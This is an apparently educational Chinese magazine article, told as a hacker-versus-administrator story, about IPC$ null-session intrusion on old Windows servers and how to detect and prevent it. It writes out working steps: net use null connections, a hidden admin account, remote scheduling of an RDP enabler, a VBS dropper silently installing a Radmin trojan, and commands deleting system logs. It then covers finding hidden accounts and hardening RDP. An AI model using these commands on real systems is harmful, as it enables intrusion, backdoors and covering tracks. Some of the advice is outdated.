小黑小白对抗记

来源 :电脑爱好者 | 被引量 : 0次 | 上传用户:horse12
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  从本文你将学到
  √ 黑客常见入侵方式
  √ 如何避免空连接漏洞
  √ 如何从日志发现木马藏身地
  
  小黑:一个水平中等的“黑客”,曾拜师于一名高手,所以水平有所长进,最近正想找一台机器练手。
  小白:刚刚上任不到三天的网管,进入网络安全行业不久,安全水平和发现隐患的意识还需要提高。这次的攻击事件其实并不是黑客水平有多高,而是由于网络安全意识不足,一个N年前的老漏洞没进行修补导致了服务器被攻击。反思一下,上任的几天里一直忙碌着升级、打补丁;但是忽略了服务器默认的一些系统漏洞和日志的保护,让黑客钻了空子。国内很多网络管理人员都容易出现这种错误。本文就是提醒各位网络管理员,除了给系统打补丁外,还需要掌握基本的检测技术和保护系统日志才能保证服务器的安全运行。
  
  23:25 觅食——入侵检测
  晚上11点,某大虾黑客的徒弟小黑打开“IPC$空连接扫描器”,想看看今天是否能中奖找到一台不设防的服务器。时间慢慢的流逝,深夜中传来一声“YEAH!”,哈哈,居然真的还有这么原始漏洞的主机!小黑兴奋地敲击着键盘开始了入侵工作。
  
  小提示:什么是IPC$空连接
  IPC$(Internet Process Connection)是共享命名管道的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然对方机器必须开了ipc$共享),而利用这个空的连接,连接者还可以得到目标主机上的用户列表,从而开始入侵主机。
  
  23:30 挂上诱饵——建立IPC$空连接
  小黑打开本地的cmd.exe命令行,输入net use \\202.99.10.*\ipc$ "" /usE:""尝试连接对方服务器,连接成功!输入:net view \\202.99.10.* 发现C$ D$ E$ admin$都默认开启着,原来是台新服务器啊!怪不得,小黑嘴里手上都不清闲。我要完全控制这台服务器!
  
  23:45垂钓——远程控制
  IPC$空连接这个漏洞不可能一直存在,先弄个远程管理员好了——屏幕中的命令行下出现了一段命令:
  net user xiaohei$ hacker /add
  net localgroup administrators xiaohei /add
  恩,这样子就拥有了管理名为xiaohei$ 密码为hacker的高级管理员了,以后就可以通过Windows自带的“免杀控制器”:“远程桌面连接”控制服务器了! 来试验一下,打开本地开始菜单→所有程序→附件→通讯→远程桌面连接,在空白地方输入控制服务器的IP地址:202.99.10.*。“是放个木马上去呢还是添加一个FTP账号呢?”小黑脑子中闪现着无数恶毒的后门。正在这时音响中“嘣”的一声,错误提示:无法连接到远程计算机(见图1)!
  


  图1
  
  居然未开启远程服务端口了,难不倒我!继续在命令行下输入: copy C:\3389.exe \\202.99.10.*\admin$ ,将小黑本地的远程登录服务开启上传到202.99.10.*的服务器上。
  net time \\202.99.10.*,查看远程服务器的系统时间为下面的入侵收集资料,现在时间是凌晨2:10分,at \\202.99.10.* 02:18 3389.exe,利用at命令在远程计算机的2:18分执行3389.exe文件,开启远程控制(需要自动重新启动计算机)。
  
  小提示:远程桌面为什么“免杀”?
  远程桌面本是微软公司为了方便网管维护服务器而推出的一项服务,用来连接到开启了远程桌面控制功能的计算机,但是已经被很多黑客用来控制电脑。由于是系统自带服务,也不会受到杀毒软件的查杀。
  
  凌晨2:35上钩——种植木马
  为了保险起见,还是再增加一个木马后门程序控制,小黑阴险地笑着祭出了radmin影子版,由于此软件属于管理工具,一般杀毒软件都不对其设防,所以修改后成了最安全的隐形后门。
  小黑配制好木马后写了一段VBS代码使木马程序可以自动执行:
  set ws=wscript.createobject(“wscript.shell”)
  ws.run “regedit.exe /s r_server.reg”,0
  ws.run “regedit.exe /s qidong.reg”,0
  ws.run “r_server.exe /install /silence”,0
  ws.run “r_server.exe /start”,0
  将木马程序打包成muma.exe自解压文档,选择运行后自动执行VBS内容,将木马上传到系统盘下,继续利用:at \\202.99.10.* 02:15 muma.exe
  
  凌晨2:40收网——日志清理
  对了,得意不能大意,要把操作日志清理了,防止管理员发现主机被动过手脚:
  del C:\winnt\system32\logfiles\*.*
  del C:\winnt\ssytem32\config\*.evt
  del C:\winnt\system32\dtclog\*.*
  del C:\winnt\system32\*.log
  del C:\winnt\system32\*.txt
  del C:\winnt\*.txt
  del C:\winnt\*.log
  哈哈,看你还如何逃出我的掌心!!在恶魔的笑声中 202.99.10.*主机沦陷了。
  
  凌晨3:30脱钩——查询服务
  正在机房值班网管小白发现今天刚刚安装的WEB服务器(网页服务器)日志少了一段,“有可能被黑客入侵!”
  “服务器刚刚安装还没进行安全设置就被强制运行了,没想到这么快就有黑客来入侵,现在的网络真是危险啊!”小白叹了口气,日志没了。看来要手工检测了。在命令行中输入:net start ,察看启动服务(见图2)。居然Terminal Services远程控制服务被开启了,肯定被添加了管理用户。
  


  图2
  
  输入: net user,察看本地所有用户,只有administator、ASPNET、IUSR_TOPJHCN、IWAM_TOPJHCN 几个正常用户,再分别用:
  net user administator
  net user ASPNET
   查看了用户组,一切正常。看来很可能是被建立了隐藏的管理账号了。可以用下面提供的批处理程序察看隐藏账号,代码如下:
  @echo off
  cd.>netuser.txt
  for /f "skip=4 tokens=1-3" %%i in ('net user') do (
  if not "%%i"=="命令成功完成。" net use %%i>>netuser.txt 2>nul
  if not "%%j"=="" net user %%j>>netuser.txt 2>nul
  if not "%%k"=="" net user %%k>>netuser.txt 2>nul
  )
  start netuser.txt
  将以上代码保存为11.bat,执行后会自动将所有登录本地计算机用户的资料保存到netuser.txt中。
  ★Just Do It:查找隐藏用户的超强批处理
  这个专门的批处理可以到http://work.newhua.com/cfan/200717/11.rar下载。下载后查一下自己的电脑中是否有隐藏账户?如果发现了,基本肯定——你已经被“黑”了!
  
  ★实例:确认隐藏用户的存在
  为了确认存在隐藏用户的存在,在“开始→所有程序→管理工具→计算机管理”,察看本地用户和组中的用户选项,发现多了一个xiaohei$的隐藏用户,且用户在administrators组中,可以确认这个ID是黑客添加的用户了,删除此用户(也可以在命令行下net user xiaohei$ /del删除)。
  
  凌晨3:50解决安全隐患
  服务器刚刚上架就有人入侵,看来以后还是要随时管理了,就让远程管理服务开启着吧,不过需要增加一些限制才能放心使用,小白想到一个比较安全的解决方法:
  第1步 修改3389登录端口
  打开注册表将[HKEY_LOCAL_ MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]路径下的PortNumber默认键值3389修改成一个不常用的端口,如:4432。打开[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp],将PortNumber修改成4432。
  第2步 在本地“网上邻居→TCP/IP协议→属性→高级→选项→TCP/IP筛选→属性,选择启用“TCP/IP筛选”添加允许通过的端口,如:80 23 4432等相关必要服务(见图3)。
  


  图3
  
  第3步 安装防火墙,限制IP访问4432端口。
  
  小提示:网管别开终端服务
  Terminal Services服务(终端服务)在默认安装的Windows 2003服务器上是没有启动的,如果发现服务被启动,一般是被黑客入侵后留下来远程监控的,现在大多数入门级服务器的管理员会开启Terminal Services远程管理服务,推荐管理员使用VNC或者诺顿的PCANYWHERE。
其他文献
第一封(致林飞云)  飞云:  在萌生了“一了百了”的念头之后,我不知道自己为什么这么强烈地想跟你说说话。我知道你是不会理会我的,但我又控制不住地想念你。  我认识的女人无数,单是肌肤相亲的,怕也不下百人(我说这个你不会生气吧,我想你肯定能理解我的,因为你是那么的宽宏大度)。我将她们和你一同搁在世俗的天平上稱量比较,发现她们竟没有一个及得上你的。不说别的,单说纯洁善良,你足以将她们从阳间甩到阴间!
期刊
失眠患者中,老年人占有相当比例。医学研究认为,老人容易失眠的原因主要有以下四点:    一、生物钟障碍的影响    时间生物学研究表明,人体的睡眠-觉醒是在生物钟的控制下进行的,这种循环须借助下丘脑分泌的褪黑素的帮助。随着年龄的增长,人体松果体衰退,夜间褪黑素分泌不足,机体与环境的同步不能维持,于是感到不适,睡不着觉。这是失眠症的重要原因之一。      二、全身性疾病的影響    进入老年期以后
期刊
★傻博士有话说  上面的方法是一种变通的方案,即使对方设置了对你的上线、下线关注,也不能看到你的在线状态了。如果你使用的是MSN,要想实现同样的要求,可以使用暂阻止的方法来实现,先将那些你不想让其看到自己在线的联系人阻止。不过,阻止之后,对方将不能给你发送消息,而上面的QQ设置中,你可以正常地与对方进行文字联系。    问:在QQ中,有一部分好友我不想让他们看到我的在线状态,而其他好友必须让他们能
期刊
对于使用S60智能手机的朋友来说,有了大容量存储卡的支持,Java软件的大小就不用过多考虑了,不像普通手机那样需要控制Java文件大小了。不过,由于Java软件的通用性比较好,对于普通、智能手机都有兼顾,因此许多软件体积还是比较小的,如果把大量的小体积Java软件装到智能手机里使用,不仅安装起来费时,而且查找起来也不方便。Multime Constructor(下载地址:http://work.n
期刊
人们常说“月有阴晴圆缺,人有悲欢离合”,此语也形象地说明,我们的命运与月亮一样变化不定,人月同理。现在,科学家已经有了充分的依据证明,我们的身体与情绪确实随着月亮的阴晴圆缺发生着微妙的变化。      有一种人,每逢新年都雄心勃勃,如立志戒烟、坚持不懈地锻炼身体、减肥瘦身,或持之以恒地对身体进行保养,但年年都不能长久地坚持下去,以致计划半途而废,甚至完全落空。你是否属于这种类型的人?如果是,请在新
期刊
东芝在近期发布了全新的机型,其外观更加符合现代审美特色,同时性能也非同凡响。这一改往日消费者对东芝笔记本电脑的印象—死板、简单,更注重商务。这样漂亮的本本,要是没有售后服务该怎么办?那简直不可想象。好在,东芝的售后服务同它的本本一样,好看又好用,不信?那就一起来看看东芝的服务特色吧!    保修方式要了解  保修期限:根据不同型号,自购买日起,给予一年或三年的保修。原配电池保一年。  售后服务热线
期刊
“老婆,我不喜欢吃白米饭。”老婆皱起眉头,说:“你怎么跟小孩似的说变卦就变卦?今天你点名要吃白米饭,我现在都给你做好了,你却不吃了。哎,真搞不懂你。说吧,你现在想吃什么?”  “我想吃面条。”“好吧,我去给你买。”  “不,我要吃手擀面。”“行,我给你买擀面。”  “不,我要你亲自动手给我做擀面,外面买的没有老婆做的好吃。”老婆一听,跳将起来:“有没有搞错,早晨刚叫我给你榨了豆浆喝,现在又要我做手
期刊
485元http://www.kimprofit.com0755-88359904    在这个产品同质化严重的今天,机箱厂商往往以精湛的做工和出众的外形吸引消费者。这次我们收到的金盈利2001机箱不但在外观上非常标新立异,而且各种人性化细节也丝毫不马虎。  金盈利2001机箱在外观上非常个性化。可以说再没有哪个机箱比它更大胆的了,机箱前面板仿佛有一只八爪鱼趴在上面,看上去一模一样的八颗螺钉其实内
期刊
WinRE为我们提供了一个环境,不妨把它移植到硬盘上,用起来更方便。    Vista启动不了,怎么办?别着急,把Vista安装光盘放入光驱→选择语言→单击“下一步”(Next)→点击“修复你的电脑”(Repair your computer),即可启动WinRE。WinRE类似XP下的故障恢复控制台,只是它的功能更强大,提供自动修复、系统备份/还原、内存诊断等工具,方便我们修复系统故障。但是,每
期刊
《幽灵行动—尖峰战士2》剧情是接续前作之后的2014年,因为叛军在企图以核武器威胁的阴谋失败后,化整为零地秘密潜入,打算直接策动阴谋,引发暴动。玩家在游戏中依旧扮演“幽灵”小队队长Scott Mitchell,率领小队成员来到厄尔巴索市,展开全新的反恐战斗任务。游戏的光影效果大大超出前作,当然游戏可玩性也极大加强,专业、繁琐的操作模式已经被优化,可玩性也更强了。    小提示:最低配置要求  操作
期刊